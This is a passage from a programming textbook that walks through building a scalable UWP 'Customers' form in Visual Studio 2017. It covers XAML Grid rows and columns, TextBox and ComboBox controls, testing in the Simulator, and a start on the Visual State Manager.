have these skills are not programmers, so although they might be able to
design a wonderful user interface, they might not be able to implement the
logic required to make it useful. Fortunately, Visual Studio 2017 makes it
possible for you to separate the user interface design from the business logic
so that a graphic artist and a developer can cooperate to build a really cool-
looking app that also works well. All a developer has to do is concentrate on
the basic layout of the app and let a graphic artist provide the styling.
Implementing a scalable user interface
The key to laying out the user interface for a UWP app is to understand how
to make it scale and adapt to the different form factors available for the
devices on which users might run the app. In the following exercises, you
will investigate how to achieve this scaling.
Lay out the page for the Customers app
1. In the toolbar at the top of the Design View window, notice the drop-
down list box that enables you to select the resolution and form factor of
the design surface and a pair of buttons that enable you to select the
orientation (portrait or landscape) for devices that support rotations
(tablets and phones do; desktops, Xbox, Surface Hub, IoT devices, and
HoloLens devices don’t). The intent is that you can use these options to
quickly see how a user interface will appear on different devices.
The default layout is for a Surface Book with a 13.5-inch screen in the
landscape orientation; this form factor does not support portrait mode.
2. In the drop-down list box, select 8” Tablet (1280 x 800). This is the
form factor for a tablet device that supports rotations, and both
landscape and portrait modes are available.
Finally, click 13.3” Desktop. This is the form factor that you will use for
the Customers application. This form factor defaults to the landscape
orientation.
Note You might find that the page layout in the Design View
window appears too small (or too large). You can zoom in and out
by using the Zoom drop-down list box at the bottom left of the
Design View window.
3. Review the XAML markup for the MainPage page.
The page contains a single Grid control:
<Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">

</Grid>
Note Don’t worry about the way in which the Background
property is specified for the Grid control. This is an example of
using a style, and you will learn about using styles later in this
chapter.
Understanding how the Grid control works is fundamental to building
scalable and flexible user interfaces. The Page element can contain only
a single item, and if you want, you can replace the Grid control with a
Button, as shown in the example that follows:
Note Don’t type the following code. It is shown for illustrative
purposes only.
<Page
    ... >
    <Button Content="Click Me"/>
</Page>
However, the resulting app is probably not very useful; a form that
contains a button and that displays nothing else is unlikely to win an
award as the world’s greatest app. If you attempt to add a second
control, such as a TextBox, to the page, your code will not compile and
the errors shown in the following image will occur:
The purpose of the Grid control is to facilitate adding multiple items to a
page. The Grid control is an example of a container control; it can
contain a number of other controls, and you can specify the position of
these other controls within the grid. Other container controls are also
available. For example, the StackPanel control automatically places the
controls it contains in a vertical arrangement, with each control
positioned directly below its immediate predecessor.
In this app, you will use a Grid to hold the controls necessary for a user
to be able to enter and view data for a customer.
4. Add a TextBlock control to the page, either by dragging it from the
Toolbox or by typing the text <TextBlock /> directly into the
XAML pane, on the blank line after the opening <Grid> tag, like this:
<Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
    <TextBlock />
</Grid>
Tip If the Toolbox does not appear, click Toolbox on the View
menu; the Toolbox should then be displayed as a pane to the left of
the Design View window. Click
Common XAML Controls to display the contents of the Toolbox.
Also, note that you can type the code for a control directly into the
XAML window for a page; you do not have to drag controls from
the Toolbox.
5. This TextBlock provides the title for the page. Set the properties of the
TextBlock control by using the values in the following table:
Property               Value
HorizontalAlignment    Left
Margin                 400,90,0,0
TextWrapping           Wrap
Text                   Adventure Works Customers
VerticalAlignment      Top
FontSize               50
You can set these properties by using the Properties window or by
typing the equivalent XAML markup into the XAML window, as shown
here in bold:
<TextBlock HorizontalAlignment="Left" Margin="400,90,0,0" TextWrapping="Wrap"
           Text="Adventure Works Customers" VerticalAlignment="Top"
           FontSize="50"/>
The resulting text should appear in the Design View window, like this:
Notice that when you drag a control from the Toolbox to a form,
connectors appear that specify the distance of two of the sides of the
control from the edge of the container control in which it is placed. In
the preceding example, these connectors for the TextBlock control are
labeled with the values 400 (from the left edge of the grid) and 90 (from
the top edge of the grid). At run time, if the Grid control is resized, the
TextBlock will move to retain these distances, which in this case might
cause the distance of the TextBlock in pixels from the right and bottom
edges of the Grid to change. You can specify the edge or edges to which
a control is anchored by setting the HorizontalAlignment and
VerticalAlignment properties. The Margin property specifies the
distance from the anchored edges. Again, in this example, the
HorizontalAlignment property of the TextBlock is set to Left and the
VerticalAlignment property is set to Top, which is why the control is
anchored to the left and top edges of the grid. The Margin property
contains four values that specify the distance of the left, top, right, and
bottom sides (in that order) of the control from the corresponding edge
of the container. If one side of a control is not anchored to an edge of the
container, you can set the corresponding value in the Margin property to
0.
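For instance (an illustrative fragment, not part of the Customers form), a
control anchored to the bottom-right corner of its container would be declared
like this:

<!-- Anchored 20 pixels from the right and bottom edges; left and top are 0 -->
<TextBlock HorizontalAlignment="Right" VerticalAlignment="Bottom"
           Margin="0,0,20,20" Text="Status"/>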
6. Add four more TextBlock controls to the page. These TextBlock controls
are labels that help the user identify the data that is displayed on the
page. Use the values in the following table to set the properties of these
controls:
Control          Property               Value
First Label      HorizontalAlignment    Left
                 Margin                 330,190,0,0
                 TextWrapping           Wrap
                 Text                   ID
                 VerticalAlignment      Top
                 FontSize               20
Second Label     HorizontalAlignment    Left
                 Margin                 460,190,0,0
                 TextWrapping           Wrap
                 Text                   Title
                 VerticalAlignment      Top
                 FontSize               20
Third Label      HorizontalAlignment    Left
                 Margin                 620,190,0,0
                 TextWrapping           Wrap
                 Text                   First Name
                 VerticalAlignment      Top
                 FontSize               20
Fourth Label     HorizontalAlignment    Left
                 Margin                 975,190,0,0
                 TextWrapping           Wrap
                 Text                   Last Name
                 VerticalAlignment      Top
                 FontSize               20
As before, you can either drag the controls from the Toolbox and use the
Properties window to set their properties, or you can type the following
XAML markup into the XAML pane, after the existing TextBlock
control and before the closing </Grid> tag:
<TextBlock HorizontalAlignment="Left" Margin="330,190,0,0" TextWrapping="Wrap"
           Text="ID" VerticalAlignment="Top" FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="460,190,0,0" TextWrapping="Wrap"
           Text="Title" VerticalAlignment="Top" FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="620,190,0,0" TextWrapping="Wrap"
           Text="First Name" VerticalAlignment="Top" FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="975,190,0,0" TextWrapping="Wrap"
           Text="Last Name" VerticalAlignment="Top" FontSize="20"/>
7. Below the TextBlock controls, add three TextBox controls that display
the text ID, First Name, and Last Name. Use the following table to set
the values of these controls. Notice that the Text property should be set
to the empty string (“”). Also notice that the id TextBox control is
marked as read-only. This is because customer IDs will be generated
automatically in the code that you add later:
Control          Property               Value
First TextBox    x:Name                 id
                 HorizontalAlignment    Left
                 Margin                 300,240,0,0
                 TextWrapping           Wrap
                 Text                   (leave empty)
                 VerticalAlignment      Top
                 FontSize               20
                 IsReadOnly             True
Second TextBox   x:Name                 firstName
                 HorizontalAlignment    Left
                 Margin                 550,240,0,0
                 TextWrapping           Wrap
                 Text                   (leave empty)
                 VerticalAlignment      Top
                 Width                  300
                 FontSize               20
Third TextBox    x:Name                 lastName
                 HorizontalAlignment    Left
                 Margin                 875,240,0,0
                 TextWrapping           Wrap
                 Text                   (leave empty)
                 VerticalAlignment      Top
                 Width                  300
                 FontSize               20
The following code shows the equivalent XAML markup for these
controls:
<TextBox x:Name="id" HorizontalAlignment="Left" Margin="300,240,0,0"
         TextWrapping="Wrap" Text="" VerticalAlignment="Top" FontSize="20"
         IsReadOnly="True"/>
<TextBox x:Name="firstName" HorizontalAlignment="Left" Margin="550,240,0,0"
         TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="300"
         FontSize="20"/>
<TextBox x:Name="lastName" HorizontalAlignment="Left" Margin="875,240,0,0"
         TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="300"
         FontSize="20"/>
The Name property is not required for a control, but it is useful if you
want to refer to the control in the C# code for the app. Notice that the
Name property is prefixed with x:. This is a reference to the XML
namespace http://schemas.microsoft.com/winfx/2006/xaml specified in
the Page attributes at the top of the XAML markup. This namespace
defines the Name property for all controls.
Note It is not necessary to understand why the Name property is
defined this way, but for more information, you can read the article
“x:Name Directive” at
http://msdn.microsoft.com/library/ms752290.aspx.
The Width property specifies the width of the control, and the
TextWrapping property indicates what happens if the user attempts to
enter information into the control that exceeds its width. In this case, all
the TextBox controls will wrap the text onto another line of the same
width (the control will expand vertically). The alternative value,
NoWrap, causes the text to scroll horizontally as the user enters it.
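The difference is easy to see side by side (an illustrative fragment):

<!-- Wrap: the control grows vertically as the user types past its width -->
<TextBox Width="200" TextWrapping="Wrap" />

<!-- NoWrap: the control stays one line tall; the text scrolls horizontally -->
<TextBox Width="200" TextWrapping="NoWrap" />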
8. Add a ComboBox control to the form, placing it below the Title
TextBlock control, between the id and firstName TextBox controls. Set
the properties of this control as follows:
Property               Value
x:Name                 title
HorizontalAlignment    Left
Margin                 420,240,0,0
VerticalAlignment      Top
Width                  100
FontSize               20
The equivalent XAML markup for this control is as follows:
<ComboBox x:Name="title" HorizontalAlignment="Left" Margin="420,240,0,0"
          VerticalAlignment="Top" Width="100" FontSize="20"/>
You use a ComboBox control to display a list of values from which the
user can select.
9. In the XAML pane, replace the definition of the ComboBox control and
add four ComboBoxItem controls, as follows in bold:
<ComboBox x:Name="title" HorizontalAlignment="Left" Margin="420,240,0,0"
          VerticalAlignment="Top" Width="100" FontSize="20">
    <ComboBoxItem Content="Mr"/>
    <ComboBoxItem Content="Mrs"/>
    <ComboBoxItem Content="Ms"/>
    <ComboBoxItem Content="Miss"/>
</ComboBox>
The ComboBoxItem elements are displayed in a drop-down list when
the app runs, and the user can select one of them.
There is one important syntactical point to notice in this code; the
ComboBox markup has been split into an opening <ComboBox> tag and
a closing </ComboBox> tag. You place the ComboBoxItem controls
between these opening and closing tags.
Note A ComboBox control can display simple elements such as a
set of ComboBoxItem controls that display text, but it can also
contain more complex elements such as buttons, check boxes, and
radio buttons. If you are adding simple ComboBoxItem controls, it
is probably easier to type the XAML markup by hand, but if you
are adding more complex controls, the Object Collection Editor
available in the Properties window can prove very useful.
However, you should avoid trying to be too clever in a combo box;
the best apps are those that provide the most intuitive UIs, and
embedding complex controls in a combo box can be confusing to a
user.
10. Add two more TextBox controls and two more TextBlock controls to the
form. With the TextBox controls, the user will be able to enter an email
address and a telephone number for the customer, and the TextBlock
controls provide the labels for the text boxes. Use the values in the
following table to set the properties of the controls.
Control            Property               Value
First TextBlock    HorizontalAlignment    Left
                   Margin                 300,390,0,0
                   TextWrapping           Wrap
                   Text                   Email
                   VerticalAlignment      Top
                   FontSize               20
First TextBox      x:Name                 email
                   HorizontalAlignment    Left
                   Margin                 450,390,0,0
                   TextWrapping           Wrap
                   Text                   (leave empty)
                   VerticalAlignment      Top
                   Width                  400
                   FontSize               20
Second TextBlock   HorizontalAlignment    Left
                   Margin                 300,540,0,0
                   TextWrapping           Wrap
                   Text                   Phone
                   VerticalAlignment      Top
                   FontSize               20
Second TextBox     x:Name                 phone
                   HorizontalAlignment    Left
                   Margin                 450,540,0,0
                   TextWrapping           Wrap
                   Text                   (leave empty)
                   VerticalAlignment      Top
                   Width                  200
                   FontSize               20
The XAML markup for these controls should look like this:
<TextBlock HorizontalAlignment="Left" Margin="300,390,0,0" TextWrapping="Wrap"
           Text="Email" VerticalAlignment="Top" FontSize="20"/>
<TextBox x:Name="email" HorizontalAlignment="Left" Margin="450,390,0,0"
         TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="400"
         FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="300,540,0,0" TextWrapping="Wrap"
           Text="Phone" VerticalAlignment="Top" FontSize="20"/>
<TextBox x:Name="phone" HorizontalAlignment="Left" Margin="450,540,0,0"
         TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="200"
         FontSize="20"/>
The completed form in the Design View window should look like this:
11. On the Debug menu, click Start Debugging to build and run the app.
The app starts and displays the form. You can enter data into the form
and select a title from the combo box, but you cannot do much else yet.
However, a much bigger problem is that, depending on the resolution of
your screen, the form looks awful (if the form looks fine, drag the right-
hand edge to make it narrower). The right side of the display has been
cut off, much of the text has wrapped around, and the Last Name text
box has been truncated:
12. Click and drag the right side of the window to expand the display so that
the text and controls are displayed as they appeared in the Design View
window in Visual Studio. This is the optimal size of the form as it was
designed.
13. Resize the window displaying the Customer app to its minimum width.
This time, much of the form disappears. Some of the TextBlock content
wraps, but the form is clearly not usable in this view.
14. Return to Visual Studio, and on the Debug menu, click Stop Debugging.
That was a salutary lesson in being careful about how you lay out an app.
Although the app looked fine when it ran in a window that was the same size
as the Design View, as soon as you resized the window to a narrower view, it
became less useful (or even completely useless). Additionally, the app
assumes that the user will be viewing the screen on a device in the landscape
orientation. If you temporarily switch the Design View window to the 12”
Tablet form factor and click the Portrait orientation button, you can see what
the form would look like if the user ran the app on a tablet that supports
different orientations and rotated the device to switch to portrait mode. (Don’t
forget to switch back to the 13.3” Desktop form factor afterward.)
The issue is that the layout technique shown so far does not scale and
adapt to different form factors and orientations. Fortunately, you can use the
properties of the Grid control and another feature called the Visual State
Manager to solve these problems.
Using the Simulator to test a Universal Windows
Platform app
Even if you don’t have a tablet computer, you can still test your UWP
apps and see how they behave on a mobile device by using the
Simulator provided with Visual Studio 2017. The Simulator mimics a
tablet device, providing you with the ability to emulate user gestures
such as pinching and swiping objects, as well as rotating and changing
the resolution of the device.
To run an app in the Simulator, open the Debug Target drop-down
list box on the Visual Studio toolbar. By default, the debug target is set
to Local Machine, which causes the app to run full-screen on your
computer, but you can select Simulator from this list, which starts the
Simulator when you debug the app. Note that you can also set the debug
target to a different computer if you need to perform remote debugging
(you will be prompted for the network address of the remote computer
when you select this option). The following image shows the Debug
Target list:
After you have selected the Simulator, when you run the app from
the Debug menu in Visual Studio, the Simulator starts and displays your
app. The toolbar down the right side of the Simulator window contains
a selection of tools with which you can emulate user gestures by using
the mouse. You can even simulate the location of the user if the app
requires information about the geographic position of the device.
However, for testing the layout of an app, the most important tools are
Rotate Clockwise, Rotate Counterclockwise, and Change Resolution.
The following image shows the Customers app running in the
Simulator. The app has been maximized to occupy the full screen. The
labels describe the function of each of the buttons for the Simulator.
Note The screenshots in this section were captured on a computer
with the Simulator running at a resolution of 1366 × 768
(representing a 10.6-inch display). If you are using a different
display resolution, you might need to click the Change Resolution
button and switch to 1366 × 768 to get the same results as shown
here.
The following image shows the same app after the user has clicked
the Rotate Clockwise button, which causes the app to run in the portrait
orientation:
You can also try to see how the app behaves if you change the
resolution of the Simulator. The following image shows the Customers
app running when the Simulator is set to a high-resolution device (2560
× 1440, the typical resolution of a 27-inch monitor). You can see that
the display for the app is squeezed into the upper-left corner of the
screen:
The Simulator behaves exactly like a Windows 10 computer (it is, in
fact, a remote-desktop connection to your own computer). To stop the
Simulator, click the Windows button (in the Simulator, not on your
desktop), click Power, and then click Disconnect.
You should notice that Visual Studio also supports emulators for
specific mobile devices. Some may be listed in the Debug Target
drop-down list box, but you can install new emulators as they become
available by selecting Download New Emulators.
Implementing a tabular layout by using a Grid control
You can use the Grid control to implement a tabular layout. A Grid contains
rows and columns, and you can specify in which rows and columns other
controls should be placed. The beauty of the Grid control is that you can
specify the sizes of the rows and columns that it contains as relative values;
as the grid shrinks or grows to adapt itself to the different form factors and
orientations to which users might switch, the rows and columns can shrink
and grow in proportion to the grid. The intersection of a row and a column in
a grid defines a cell, and if you position controls in cells, they will move as
the rows and columns shrink and grow. Therefore, the key to implementing a
scalable UI is to break it down into a collection of cells and place related
elements in the same cell. A cell can contain another grid, giving you the
ability to fine-tune the exact positioning of each element.
If you consider the Customers app, you can see that the UI breaks down
into two main areas: a heading containing the title and the body containing
the customers’ details. Allowing for some spacing between these areas and a
margin at the bottom of the form, you can assign relative sizes to each of
these areas, as shown in the following diagram:
The diagram shows only rough approximations, but the row for the
heading is twice as high as the row for the spacer below it. The row for the
body is ten times as high as the spacer, and the bottom margin is twice the
height of the spacer.
To hold the elements in each area, you can define a grid with four rows
and place the appropriate items in each row. However, the body of the form
can be described by another, more complex grid, as shown in the following
diagram:
Again, the height of each row is specified in relative terms, as is the width
of each column. Also, you can clearly see that the TextBox elements for
Email and Phone do not quite fit this grid pattern. If you were being pedantic,
you might choose to define further grids inside the body of the form to make
these items fit. However, you should keep in mind the purpose of this grid,
which is to define the relative positioning and spacing of elements. Therefore,
it is acceptable for an element to extend beyond the boundaries of a cell in the
grid arrangement.
In the next exercise, you will modify the layout of the Customers app to
use this grid format to position the controls.
Modify the layout to scale to different form factors and orientations
1. In the XAML pane for the Customers app, add another Grid inside the
existing Grid element, before the first TextBlock control. Give this new
Grid a margin of 10 pixels from the left and right edges of the parent
Grid and 20 pixels from the top and bottom, as shown in bold in the
following code:
<Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
    <Grid Margin="10,20,10,20">

    </Grid>
    <TextBlock HorizontalAlignment="Left" TextWrapping="Wrap"
               Text="Adventure Works Customers" ... />
    ...
</Grid>
You could define the rows and columns as part of the existing Grid, but
to maintain a consistent look and feel with other UWP apps, you should
leave some blank space to the left and at the top of a page.
2. Add the following <Grid.RowDefinitions> section shown in bold to the
new Grid element.
<Grid Margin="10,20,10,20">
    <Grid.RowDefinitions>
        <RowDefinition Height="2*"/>
        <RowDefinition Height="*"/>
        <RowDefinition Height="10*"/>
        <RowDefinition Height="2*"/>
    </Grid.RowDefinitions>
</Grid>
The <Grid.RowDefinitions> section defines the rows for the grid. In this
example, you have defined four rows. You can specify the size of a row
as an absolute value specified in pixels, or you can use the * operator to
indicate that the sizes are relative and that Windows should calculate the
row sizes itself when the app runs, depending on the form factor and
resolution of the screen. The values used in this example correspond to
the relative row sizes for the header, body, spacer, and bottom margin of
the Customers form shown in the earlier diagram.
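To make the distinction concrete, here is an illustrative fragment (not part
of the exercise) that mixes absolute and relative sizes in one grid:

<Grid.RowDefinitions>
    <RowDefinition Height="48"/>  <!-- always exactly 48 pixels -->
    <RowDefinition Height="*"/>   <!-- one share of the remaining space -->
    <RowDefinition Height="2*"/>  <!-- two shares of the remaining space -->
</Grid.RowDefinitions>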
3. Move the TextBlock control that contains the text “Adventure Works
Customers” into the Grid, directly after the closing
</Grid.RowDefinitions> tag but before the closing </Grid> tag.
4. Add a Grid.Row attribute to the TextBlock control and set the value to 0.
<Grid Margin="10,20,10,20">
    <Grid.RowDefinitions>
        ...
    </Grid.RowDefinitions>
    <TextBlock Grid.Row="0" ... Text="Adventure Works Customers" ... />
    ...
</Grid>
This indicates that the TextBlock should be positioned within the first
row of the Grid. (Grid controls number rows and columns starting at
zero.)
Note The Grid.Row attribute is an example of an attached
property. An attached property is a property that a control receives
from the container control in which it is placed. Outside a grid, a
TextBlock does not have a Row property (it would be meaningless),
but when positioned within a grid, the Row property is attached to
the TextBlock, and the TextBlock control can assign it a value. The
Grid control then uses this value to determine where to display the
TextBlock control. Attached properties are easy to spot because
they have the form ContainerType.PropertyName.
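A couple of illustrative fragments (not from the Customers app) show the
pattern:

<!-- Grid attaches Row and Column to its child controls -->
<Button Grid.Row="1" Grid.Column="2" Content="OK"/>

<!-- Canvas attaches Left and Top in the same way -->
<Rectangle Canvas.Left="30" Canvas.Top="40" Width="50" Height="50"/>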
5. Remove the Margin property, and set the HorizontalAlignment and
VerticalAlignment properties to Center.
This will cause the TextBlock to appear centered in the row.
The XAML markup for the Grid and TextBlock controls should look like
this (the changes to the TextBlock are highlighted in bold):
<Grid Margin="10,20,10,20">
    ...
    </Grid.RowDefinitions>
    <TextBlock Grid.Row="0" HorizontalAlignment="Center" TextWrapping="Wrap"
               Text="Adventure Works Customers" VerticalAlignment="Center"
               FontSize="50"/>
    ...
</Grid>
6. After the TextBlock control, add another nested Grid control. This Grid
will be used to lay out the controls in the body of the form and should
appear in the third row of the outer Grid (the row of size 10*), so set the
Grid.Row property to 2, as shown in bold in the following code:
<Grid Margin="10,20,10,20">
    <Grid.RowDefinitions>
        <RowDefinition Height="2*"/>
        <RowDefinition Height="*"/>
        <RowDefinition Height="10*"/>
        <RowDefinition Height="2*"/>
    </Grid.RowDefinitions>
    <TextBlock Grid.Row="0" HorizontalAlignment="Center" .../>
    <Grid Grid.Row="2">

    </Grid>
    ...
</Grid>
7. Add the following <Grid.RowDefinitions> and
<Grid.ColumnDefinitions> sections to the new Grid control:
<Grid Grid.Row="2">
    <Grid.RowDefinitions>
        <RowDefinition Height="*"/>
        <RowDefinition Height="*"/>
        <RowDefinition Height="2*"/>
        <RowDefinition Height="*"/>
        <RowDefinition Height="2*"/>
        <RowDefinition Height="*"/>
        <RowDefinition Height="4*"/>
    </Grid.RowDefinitions>
    <Grid.ColumnDefinitions>
        <ColumnDefinition Width="*"/>
        <ColumnDefinition Width="*"/>
        <ColumnDefinition Width="20"/>
        <ColumnDefinition Width="*"/>
        <ColumnDefinition Width="20"/>
        <ColumnDefinition Width="2*"/>
        <ColumnDefinition Width="20"/>
        <ColumnDefinition Width="2*"/>
        <ColumnDefinition Width="*"/>
    </Grid.ColumnDefinitions>
</Grid>
These row and column definitions specify the height and width of each
of the rows and columns shown earlier in the diagram that depicted the
structure of the body of the form. There is a small space of 20 pixels
between each of the columns that will hold controls.
8. Move the TextBlock controls that display the ID, Title, First Name, and
Last Name labels inside the nested Grid control, immediately after the
closing <Grid.ColumnDefinitions> tag.
9. Set the Grid.Row property for each TextBlock control to 0 (these labels
will appear in the first row of the grid). Set the Grid.Column property
for the ID label to 1, the Grid.Column property for the Title label to 3,
the Grid.Column property for the First Name label to 5, and the
Grid.Column property for the Last Name label to 7.
10. Remove the Margin property from each of the TextBlock controls, and
set the HorizontalAlignment and VerticalAlignment properties to Center.
The XAML markup for these controls should look like this (the changes
are highlighted in bold):
<Grid Grid.Row="2">
    <Grid.RowDefinitions>
        ...
    </Grid.RowDefinitions>
    <Grid.ColumnDefinitions>
        ...
    </Grid.ColumnDefinitions>
    <TextBlock Grid.Row="0" Grid.Column="1" HorizontalAlignment="Center"
               TextWrapping="Wrap" Text="ID" VerticalAlignment="Center"
               FontSize="20"/>
    <TextBlock Grid.Row="0" Grid.Column="3" HorizontalAlignment="Center"
               TextWrapping="Wrap" Text="Title" VerticalAlignment="Center"
               FontSize="20"/>
    <TextBlock Grid.Row="0" Grid.Column="5" HorizontalAlignment="Center"
               TextWrapping="Wrap" Text="First Name" VerticalAlignment="Center"
               FontSize="20"/>
    <TextBlock Grid.Row="0" Grid.Column="7" HorizontalAlignment="Center"
               TextWrapping="Wrap" Text="Last Name" VerticalAlignment="Center"
               FontSize="20"/>
</Grid>
11. Move the id, firstName, and lastName TextBox controls and the title
ComboBox control inside the nested Grid control, immediately after the
Last Name TextBlock control.
Place these controls in row 1 of the Grid control. Put the id control in
column 1, the title control in column 3, the firstName control in column
5, and the lastName control in column 7.
Remove the Margin of each of these controls, and set the
VerticalAlignment property to Center. Remove the Width property, and
set the HorizontalAlignment property to Stretch. This causes the control
to occupy the entire cell when it is displayed, and the control shrinks or
grows as the size of the cell changes.
The completed XAML markup for these controls should look like this,
with changes highlighted in bold:
<Grid Grid.Row="2">
    <Grid.RowDefinitions>
        ...
    </Grid.RowDefinitions>
    <Grid.ColumnDefinitions>
        ...
    </Grid.ColumnDefinitions>
    ...
    <TextBlock Grid.Row="0" Grid.Column="7" ... Text="Last Name" .../>
    <TextBox Grid.Row="1" Grid.Column="1" x:Name="id"
             HorizontalAlignment="Stretch" TextWrapping="Wrap" Text=""
             VerticalAlignment="Center" FontSize="20" IsReadOnly="True"/>
    <TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName"
             HorizontalAlignment="Stretch" TextWrapping="Wrap" Text=""
             VerticalAlignment="Center" FontSize="20"/>
    <TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName"
             HorizontalAlignment="Stretch" TextWrapping="Wrap" Text=""
             VerticalAlignment="Center" FontSize="20"/>
    <ComboBox Grid.Row="1" Grid.Column="3" x:Name="title"
              HorizontalAlignment="Stretch" VerticalAlignment="Center"
              FontSize="20">
        <ComboBoxItem Content="Mr"/>
        <ComboBoxItem Content="Mrs"/>
        <ComboBoxItem Content="Ms"/>
        <ComboBoxItem Content="Miss"/>
    </ComboBox>
</Grid>
12. Move the TextBlock control for the Email label and the email TextBox
control to the nested Grid control, immediately after the closing tag of
the title ComboBox control.
Place these controls in row 3 of the Grid control. Put the Email label in
column 1 and the email TextBox control in column 3. Additionally, set
the Grid.ColumnSpan property for the email TextBox control to 5; this
allows the control to spread across five columns, up to the width
specified by its Width property, as shown in the earlier diagram.
Set the HorizontalAlignment property of the Email label control to
Center, but leave the HorizontalAlignment property of the email
TextBox set to Left; this control should remain left-justified against the
first column that it spans rather than being centered across them all.
Set the VerticalAlignment property of the Email label and the email
TextBox control to Center.
Remove the Margin property for both of these controls.
The following XAML markup shows the completed definitions of these
controls:
<Grid Grid.Row="2">
    <Grid.RowDefinitions>
        ...
    </Grid.RowDefinitions>
    <Grid.ColumnDefinitions>
        ...
    </Grid.ColumnDefinitions>
    ...
    <ComboBox Grid.Row="1" Grid.Column="3" x:Name="title" ...>
        ...
    </ComboBox>
    <TextBlock Grid.Row="3" Grid.Column="1" HorizontalAlignment="Center"
               TextWrapping="Wrap" Text="Email" VerticalAlignment="Center"
               FontSize="20"/>
    <TextBox Grid.Row="3" Grid.Column="3" Grid.ColumnSpan="5" x:Name="email"
             HorizontalAlignment="Left" TextWrapping="Wrap" Text=""
             VerticalAlignment="Center" Width="400" FontSize="20"/>
</Grid>
13. Move the TextBlock control for the Phone label and phone TextBox
control to the nested Grid control, immediately after the email TextBox
control.
Place these controls in row 5 of the Grid control. Put the Phone label in
column 1 and the phone TextBox control in column 3. Set the
Grid.ColumnSpan property for the phone TextBox control to 3.
Set the HorizontalAlignment property of the Phone label control to
Center, and leave the HorizontalAlignment property of the phone
TextBox set to Left.
Set the VerticalAlignment property of both controls to Center, and
remove the Margin property.
The following XAML markup shows the completed definitions of these
controls:
<Grid Grid.Row="2">
    <Grid.RowDefinitions>
        ...
    </Grid.RowDefinitions>
    <Grid.ColumnDefinitions>
        ...
    </Grid.ColumnDefinitions>
    ...
    <TextBox ... x:Name="email" .../>
    <TextBlock Grid.Row="5" Grid.Column="1" HorizontalAlignment="Center"
               TextWrapping="Wrap" Text="Phone" VerticalAlignment="Center"
               FontSize="20"/>
    <TextBox Grid.Row="5" Grid.Column="3" Grid.ColumnSpan="3" x:Name="phone"
             HorizontalAlignment="Left" TextWrapping="Wrap" Text=""
             VerticalAlignment="Center" Width="200" FontSize="20"/>
</Grid>
14. On the Visual Studio toolbar, in the Debug Target list, select Simulator.
You will run the app in the Simulator so that you can see how the layout
adapts to different resolutions and form factors.
15. On the Debug menu, click Start Debugging.
The Simulator starts and the Customers app runs. Maximize the app so
that it occupies the entire screen in the Simulator. Click Change
Resolution, and then configure the Simulator to display the app using a
screen resolution of 1366 × 768. Also, ensure that the Simulator is
displayed in landscape orientation (click Rotate Clockwise if it is
running in portrait orientation). Verify that the controls are evenly
spaced in this orientation.
16. Click the Rotate Clockwise button to rotate the Simulator to portrait
orientation.
The Customers app should adjust the layout of the user interface, and the
controls should still be evenly spaced and usable:
17. Click Rotate Counterclockwise to put the Simulator back to landscape
orientation, and then click Change Resolution and switch the resolution
of the Simulator to 2560 × 1440.
Notice that the controls remain evenly spaced on the form, although the
labels might be quite difficult to read unless you actually have a 27-inch
screen.
18. Click Change Resolution again and switch the resolution to 1024 × 768.
Again, notice how the spacing and size of the controls are adjusted to
maintain the even balance of the user interface:
19. In the Simulator, double-click the top edge of the form to restore the
view as a window, and then drag and resize the window so that the form
is displayed in the left half of the screen. Reduce the width of the
window to its minimum. This is how the app might appear on a device
such as a smartphone.
All the controls remain visible, but the text for the Phone label and the
title wrap, making them difficult to read, and the controls are not
particularly easy to use anymore:
20. In the Simulator, click the Start button, click Settings, click Power, and
then click Disconnect.
The Simulator closes, and you return to Visual Studio.
21. On the Visual Studio toolbar, in the Debug Target drop-down list box,
select Local Machine.
Adapting the layout by using the Visual State Manager
The user interface for the Customers app scales for different resolutions and
form factors, but it still does not work well if you reduce the width of the
view, and it probably would not look too good on a smartphone, which has an
even narrower width. If you think about it, the solution to the problem in
these cases is not so much a matter of scaling the controls as actually laying
them out in a different way. For example, it would make better sense if the
Customers form looked like this in a narrow view:
You can achieve this effect in several ways:
You can create several versions of the MainPage.xaml file, one for
each device family. Each of these XAML files can be linked to the
same code-behind (MainPage.xaml.cs) so that they all run the same
code. For example, to create an XAML file for a smartphone, add a
folder named DeviceFamily-Mobile (this name is important) to the
project and then add a new XAML view named MainPage.xaml to the
folder by using the Add New Item menu command. Lay out the
controls on this page as they should be displayed on a
smartphone. The XAML view will be linked automatically to the
existing MainPage.xaml.cs file. At runtime, the UWP will select the
appropriate view based on the type of device on which the app is
running.
You can use the Visual State Manager to modify the layout of the page
at runtime. All UWP apps implement a Visual State Manager that
tracks the visual state of an app. It can detect when the height and
width of the window changes, and you can add XAML markup that
positions controls depending on the size of the window. This markup
can move controls around or display and hide controls.
You can use the Visual State Manager to switch between views based
on the height and width of the window. This approach is a hybrid
combination of the first two options described here, but it is the least
messy (you don’t have to write lots of tricky code to calculate the best
position for each control) and is also the most flexible (it will work if
the window is narrowed on the same device).
You’ll follow the third of these approaches in the next exercises. The first
step is to define a layout for the customers’ data that should appear in a
narrow view.
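To preview where this is heading, the following is a minimal sketch of Visual
State Manager markup driven by adaptive triggers (the 660-pixel threshold is
illustrative; the exercises build the real markup step by step):

<VisualStateManager.VisualStateGroups>
    <VisualStateGroup>
        <!-- Applied when the window is at least 660 pixels wide -->
        <VisualState x:Name="WideState">
            <VisualState.StateTriggers>
                <AdaptiveTrigger MinWindowWidth="660"/>
            </VisualState.StateTriggers>
            <VisualState.Setters>
                <Setter Target="customersTabularView.Visibility" Value="Visible"/>
                <Setter Target="customersColumnarView.Visibility" Value="Collapsed"/>
            </VisualState.Setters>
        </VisualState>
        <!-- Applied in narrower windows -->
        <VisualState x:Name="NarrowState">
            <VisualState.StateTriggers>
                <AdaptiveTrigger MinWindowWidth="0"/>
            </VisualState.StateTriggers>
            <VisualState.Setters>
                <Setter Target="customersTabularView.Visibility" Value="Collapsed"/>
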